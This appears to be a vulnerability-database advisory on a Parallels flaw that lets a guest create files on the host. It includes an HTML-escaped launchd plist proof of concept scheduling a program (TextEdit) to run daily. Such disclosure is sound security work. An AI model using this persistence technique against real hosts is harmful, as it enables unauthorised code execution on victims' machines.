Parallels Drag and Drop Hidden Share Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Parallels Arbitrary Code-Execution Vulnerability due to Design Fla


                                                source: http://www.securityfocus.com/bid/22597/info

Parallels is prone to an arbitrary code-execution vulnerability because of a design flaw in the affected application.

An attacker can exploit this issue to create files in the host operating system. This could result in the execution of code. 

&#60;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&#62;
&#60;!DOCTYPE plist PUBLIC &#34;-//Apple Computer//DTD PLIST 1.0//EN&#34; &#34;http://
www.apple.com/DTDs/PropertyList-1.0.dtd&#34;&#62;
&#60;plist version=&#34;1.0&#34;&#62;
&#60;dict&#62;
        &#60;key&#62;Label&#60;/key&#62;
        &#60;string&#62;com.apple.test&#60;/string&#62;
        &#60;key&#62;LowPriorityIO&#60;/key&#62;
        &#60;true/&#62;
        &#60;key&#62;Nice&#60;/key&#62;
        &#60;integer&#62;1&#60;/integer&#62;
        &#60;key&#62;ProgramArguments&#60;/key&#62;
        &#60;array&#62;
                &#60;string&#62;/Applications/TextEdit.app/Contents/MacOS/TextEdit&#60;/string&#62;
                &#60;string&#62;daily&#60;/string&#62;
        &#60;/array&#62;
        &#60;key&#62;StartCalendarInterval&#60;/key&#62;
        &#60;dict&#62;
                &#60;key&#62;Hour&#60;/key&#62;
                &#60;integer&#62;18&#60;/integer&#62;
                &#60;key&#62;Minute&#60;/key&#62;
                &#60;integer&#62;0&#60;/integer&#62;
        &#60;/dict&#62;
&#60;/dict&#62;
&#60;/plist&#62;

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1